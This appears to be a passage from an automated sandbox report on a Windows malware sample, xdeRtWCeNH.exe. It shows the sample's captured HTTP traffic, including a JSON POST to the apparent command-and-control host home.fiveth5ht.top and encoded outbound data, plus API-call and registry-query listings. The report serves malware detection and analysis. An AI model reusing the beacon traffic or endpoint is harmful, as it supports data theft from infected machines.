                                                          Data Ascii: KhR4UzaFKmnJqEVm8LJOTcnv1bZXoqSTt+NR1\/dB\/nWFV6sVE\/X8P6mgBlR+X7\/p\/9epKKDoK9FSSdvx\/pUdADNg9\/wDP4VBmT+9\/n8qtVFI2Pw5P17f596vnfl\/XzOgZULLt9xU1FVzrz\/r5gV6KlaP049j\/AJ\/xqKjnXn\/XzOgr0VJ5fv8Ap\/8AXqOrNKfX5fqRn\/Wr\/umo6k\/5af5\/u1HQaBUcnb8f
                                                          Dec 28, 2024 09:29:42.754369974 CET | 2472 | OUT | Data Raw: 35 78 55 50 6d 50 5c 2f 45 6c 7a 5c 2f 72 66 4e 5c 2f 77 42 62 2b 34 5c 2f 7a 39 4b 32 39 5c 2f 77 44 75 5c 2f 69 41 7a 43 66 50 38 38 6e 5c 2f 50 4b 58 7a 4f 6d 50 38 41 50 2b 65 39 50 2b 37 38 6e 37 76 79 5c 2f 77 44 56 48 45 76 74 5c 2f 6e 32
                                                          Data Ascii: 5xUPmP\/Elz\/rfN\/wBb+4\/z9K29\/wDu\/iAzCfP88n\/PKXzOmP8AP+e9P+78n7vy\/wDVHEvt\/n2waFkMe9tgd\/8AVf8A6\/8APvTGkT53dLff28zmCqAZ5jyHfst\/3f5zf57j39qfJvk3v\/qfKi83\/j68\/wA71uvf\/wDVUMi7pNm\/enMsX7o\/zp\/mfcH3+fK94bfH\/Hr\/ANeP8+Otc50BH\/rPO2b3k\/
                                                          Dec 28, 2024 09:29:42.873897076 CET | 4944 | OUT | Data Raw: 2b 45 48 6a 76 77 62 6f 76 38 41 61 61 5c 2f 45 58 77 70 70 75 6e 61 74 34 5c 2f 38 41 47 50 67 76 52 6d 31 50 55 64 6c 35 71 46 6e 59 77 79 33 36 2b 4c 65 48 76 69 74 34 47 38 51 32 75 6b 7a 57 6e 69 5c 2f 77 69 39 5c 2f 65 77 61 70 5c 2f 62 66
                                                          Data Ascii: +EHjvwbov8Aaa\/EXwppunat4\/8AGPgvRm1PUdl5qFnYwy36+LeHvit4G8Q2ukzWni\/wi9\/ewap\/bfh5NT1e317wXqmlavf6VLoXieLXPDuh6TLqU62S6lDJ4V1jxRpkdjeW8N7qNpq8V9pdn+jZX4gcAVs3r8IZRneWrNMorf2fWyfCUK1GOCqUaKqyoRUMNDCU6WHpulGrKnP2GHnXwlCpKnVxeFp1fyPN\/C3xQo5BQ4
                                                          Dec 28, 2024 09:29:42.873960972 CET | 7416 | OUT | Data Raw: 6b 48 30 58 66 46 66 6a 42 5a 76 78 42 78 64 47 76 78 46 6a 49 5a 62 6b 38 59 59 50 4f 63 64 6c 39 44 45 54 68 4c 4c 4d 50 67 38 50 54 6a 50 43 65 77 6c 69 55 38 2b 79 61 6e 58 6a 54 71 63 31 48 2b 31 4d 75 6c 69 49 30 6e 69 36 4d 71 6e 39 69 65
                                                          Data Ascii: kH0XfFfjBZvxBxdGvxFjIZbk8YYPOcdl9DEThLLMPg8PTjPCewliU8+yanXjTqc1H+1MuliI0ni6Mqn9ieH2f\/TK8EeCP7A4b4Dq4ThnBrHcSyeYcP5fmWKoYXGZfis7r46q4Y361HBVsuynMMfhqlSjyVqGCxrw86n1apGn+9\/\/AA\/hX\/o1dv8Aw94\/+dFR\/wAP4V\/6NXb\/AMPeP\/nRV+F1j8NPEF5pH7O\/iS88
                                                          Dec 28, 2024 09:29:42.873979092 CET | 2472 | OUT | Data Raw: 42 58 78 6a 72 33 68 37 56 50 43 76 37 55 50 37 43 58 77 6f 2b 44 48 37 4e 2b 74 61 37 34 45 38 61 66 44 7a 56 64 50 31 6e 52 76 69 50 38 56 66 43 32 71 65 47 64 54 38 48 65 4b 76 44 65 70 52 61 52 5a 57 73 39 7a 38 54 64 41 30 72 77 68 66 72 65
                                                          Data Ascii: BXxjr3h7VPCv7UP7CXwo+DH7N+ta74E8afDzVdP1nRviP8VfC2qeGdT8HeKvDepRaRZWs9z8TdA0rwhfre3n1gun6YryyLptiskwxNItrbh5R6SsIt0g9nJqn\/AMIz4Zz5v\/CO6Fv3b9\/9kWG7fnO7d9nzu3c7uuec1\/KPEf0JchzzHZhj6PGGc4Cvms\/EJ45wo0Zr2fiJn1PPsyeF92KoYjL8TCVPLMRaVSNGpyY545Uc
                                                          Dec 28, 2024 09:29:43.937016964 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session ID:2
                                                          Source IP:192.168.2.7
                                                          Source Port:49706
                                                          Destination IP:81.29.149.125
                                                          Destination Port:80
                                                          PID:7584
                                                          Process:C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 28, 2024 09:29:44.833379984 CET | 284 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 143
                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                          Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                          Dec 28, 2024 09:29:46.147330046 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session ID:0
                                                          Source IP:192.168.2.7
                                                          Source Port:49703
                                                          Destination IP:3.218.7.103
                                                          Destination Port:443
                                                          PID:7584
                                                          Process:C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-28 08:29:37 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-28 08:29:37 UTC | 224 | IN | HTTP/1.1 200 OK
                                                          Date: Sat, 28 Dec 2024 08:29:37 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-28 08:29:37 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}



                                                          Target ID:0
                                                          Start time:03:29:31
                                                          Start date:28/12/2024
                                                          Path:C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\xdeRtWCeNH.exe"
                                                          Imagebase:0x6c0000
                                                          File size:4'452'352 bytes
                                                          MD5 hash:ABCFF1E6AC84A5EC546B6672CE45BF02
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:1.9%
                                                            Dynamic/Decrypted Code Coverage:11.6%
                                                            Signature Coverage:13.3%
                                                            Total number of Nodes:294
                                                            Total number of Limit Nodes:48
                                                            execution_graph: node and edge list of the interactive execution graph (rendered as a figure in the original report; the raw node identifiers and edges are not reproduced here). API calls that appear as graph nodes: Sleep, WSAStartup, recv, socket, ioctlsocket, connect, getsockname, closesocket, send, WSAIoctl, setsockopt, Process32FirstW, Process32NextW, GetSystemInfo, GlobalMemoryStatusEx, GetLogicalDrives, WSAEventSelect, select, WSAEnumNetworkEvents, FindFirstFileA, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegCloseKey, CharUpperA, QueryFullProcessImageNameA, CloseHandle, if_nametoindex, gethostname, WSAGetLastError, SleepEx, recvfrom. Several collapsed sub-graphs are annotated only as "6 API calls", "7 API calls" or "8 API calls".
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                            • API String ID: 0-1590685507

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 006C2579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 006C25CC
                                                            • GetDriveTypeA.KERNELBASE ref: 006C2647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 006C267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 006C27E2
                                                            • SHGetKnownFolderPath.SHELL32 ref: 006C286D
                                                            • FindFirstFileW.KERNELBASE ref: 006C28F8
                                                            • FindNextFileW.KERNELBASE ref: 006C291F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                            • String ID: ;%l$@$`
                                                            • API String ID: 2066228396-1933959262

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209

                                                            Control-flow Graph

                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,?), ref: 006D0711
                                                            • WSAEventSelect.WS2_32(?,?,00000000), ref: 006D09DC
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 006D09FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: N=l$multi.c
                                                            • API String ID: 2170980988-611598624

                                                            Control-flow Graph

                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 0078B2B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0077712E,?,?,?,00001001,00000000), ref: 0078A90C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: recvfrom
                                                            • String ID:
                                                            • API String ID: 846543921-0
                                                            • Opcode ID: 6d26067c46d148b4dccd7496c6e9811013c36858b101e3c9852b0c8b9cc6d686
                                                            • Instruction ID: 633683c93cf3d6212bddd60678aa1d3c38a710c368e7d2e8c0993a73a0e94e95
                                                            • Opcode Fuzzy Hash: 6d26067c46d148b4dccd7496c6e9811013c36858b101e3c9852b0c8b9cc6d686
                                                            • Instruction Fuzzy Hash: EBF01D75209348BFE620AE41DC44D7BBBEDEFC9754F05856DF958232119271AE10CBB2
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0077AA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0077AA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0077AA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0077AAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0077AB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 0077AB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0077AB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0077AC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0077AD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 0077AD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 0077ADD9
                                                            • RegEnumKeyExA.KERNELBASE ref: 0077AE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0077AE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0077AE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0077AF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0077AFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0077B072
                                                            Strings
                                                            Similarity
                                                            • API ID: QueryValue$Open$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4217438148-1047472027
                                                            • Opcode ID: 7655e259910316043299c7c79d3dbf5d4422111eb315d9c009a2445d99bdb352
                                                            • Instruction ID: cad6681f6afa896693c8d34cb0297a2cf7816fac0492d2d3167ce1a4ad975370
                                                            • Opcode Fuzzy Hash: 7655e259910316043299c7c79d3dbf5d4422111eb315d9c009a2445d99bdb352
                                                            • Instruction Fuzzy Hash: AB72A1B1604301ABF7209B24DC86B5F77E8AF85744F148828F989D7291E779ED44CB63
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 006FA832
                                                            Strings
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 006FAD0A
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 006FAE1F
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 006FAE60
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 006FA6CE
                                                            • Local port: %hu, xrefs: 006FAF28
                                                            • Bind to local port %d failed, trying next, xrefs: 006FAFE5
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 006FADAC
                                                            • bind failed with errno %d: %s, xrefs: 006FB080
                                                            • Could not set TCP_NODELAY: %s, xrefs: 006FA871
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 006FA796
                                                            • @, xrefs: 006FAC42
                                                            • cf-socket.c, xrefs: 006FA5CD, 006FA735
                                                            • Trying %s:%d..., xrefs: 006FA7C2, 006FA7DE
                                                            • @, xrefs: 006FA8F4
                                                            • Trying [%s]:%d..., xrefs: 006FA689
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 3405ea2cd25b030e63d7c465a463e67d76aceffab609ba23a8e79be2b7dec9d4
                                                            • Instruction ID: 0275984cfaeeb23e951821a3cee438ac5606281e4a0b37797a9e4ae594ff082d
                                                            • Opcode Fuzzy Hash: 3405ea2cd25b030e63d7c465a463e67d76aceffab609ba23a8e79be2b7dec9d4
                                                            • Instruction Fuzzy Hash: 3D62E2B1504345ABE7208F54C886BFBB7E6BF81314F044929FA8C97392E771A945CB93

                                                            Control-flow Graph: function at 789740 (rendered graph omitted; basic blocks marked Executed / Not Executed)
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00789946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00789974
                                                            • RegCloseKey.KERNELBASE(?), ref: 0078998B
                                                            Strings
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                            • API String ID: 3677997916-615551945
                                                            • Opcode ID: 2a080e62d773e279446958a05f9e9d4ae7a63f51c1fd5cb1f06df7517a52212f
                                                            • Instruction ID: 88c611d11a79ba82c6b6e3584fc3469c4231b5e1eb7bb596b3685d8875cd148d
                                                            • Opcode Fuzzy Hash: 2a080e62d773e279446958a05f9e9d4ae7a63f51c1fd5cb1f06df7517a52212f
                                                            • Instruction Fuzzy Hash: 5F32A6B6944201EBEB11BB24EC46A2B76D4AF54358F0C4474FA0D96263FB39ED14C7A3

                                                            Control-flow Graph: function at 6f8b50 (rendered graph omitted; basic blocks marked Executed / Not Executed)
                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 006F8C2F
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 006F8CF3
                                                            Strings
                                                            Similarity
                                                            • API ID: Sleepconnect
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 238548546-879669977
                                                            • Opcode ID: 8fe6deba3505280d65b3f5cd95230f600748ed5ac4525f5f0ffef33473d97d20
                                                            • Instruction ID: e02c04afb769331aa3e9acd298657505a742641d04c8843faffa748fab73c764
                                                            • Opcode Fuzzy Hash: 8fe6deba3505280d65b3f5cd95230f600748ed5ac4525f5f0ffef33473d97d20
                                                            • Instruction Fuzzy Hash: E1B1C37060430AAFDB10CF24C985BB6B7E2AF45314F0489ADEA594B3D2DB71EC59C761

Control-flow Graph
• Graph image not recoverable; function at 6c2f17 calling RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA and RegCloseKey
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
Similarity
• API ID: CloseEnumOpen
• String ID: d
• API String ID: 1332880857-2564639436

Control-flow Graph
• Graph image not recoverable; function at 6c76a0 calling send
APIs
• send.WS2_32(multi.c,?,?,?,N=l,00000000,?,?,006D07BF), ref: 006C76EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
Similarity
• API ID: send
• String ID: LIMIT %s:%d %s reached memlimit$N=l$SEND %s:%d send(%lu) = %ld$multi.c$send
• API String ID: 2809346765-658039478

Control-flow Graph
• Graph image not recoverable; function at 6f9290 calling the send wrapper at 6c76a0, WSAIoctl and setsockopt
APIs
• WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 006F935D
• setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 006F9389
Strings
Memory Dump Source
• Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
Similarity
• API ID: Ioctlsetsockopt
• String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
• API String ID: 1903391676-2691795271

Control-flow Graph
• Graph image not recoverable; function at 6c7770 calling recv
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
Similarity
• API ID: recv
• String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
• API String ID: 1507349165-640788491

Control-flow Graph
• Graph image not recoverable; function at 6c75e0 calling socket
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
Similarity
• API ID: socket
• String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
• API String ID: 98920635-842387772

Control-flow Graph
• Graph image not recoverable; function at 742029f calling GetLogicalDrives
APIs
• GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
Strings
Memory Dump Source
• Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\$A:\
• API String ID: 999431828-1047444362

Control-flow Graph
• Graph image not recoverable; function at 742028e calling GetLogicalDrives
APIs
• GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
Strings
Memory Dump Source
• Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\$A:\
• API String ID: 999431828-1047444362

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1877 6fa150-6fa159 1878 6fa15f-6fa17b 1877->1878 1879 6fa250 1877->1879 1880 6fa249-6fa24f 1878->1880 1881 6fa181-6fa1ce getsockname 1878->1881 1880->1879 1882 6fa1f7-6fa214 call 6fef30 1881->1882 1883 6fa1d0-6fa1f5 call 6dd090 1881->1883 1882->1880 1888 6fa216-6fa23b call 6dd090 1882->1888 1890 6fa240-6fa246 call 704f40 1883->1890 1888->1890 1890->1880
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 006FA1C6
                                                            Strings
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 006FA23B
                                                            • getsockname() failed with errno %d: %s, xrefs: 006FA1F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
• Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            • Opcode ID: 6798e38285bbc9f6348fa76c83b149d6e14a8aadc4bf941a20345fc7df2c1dba
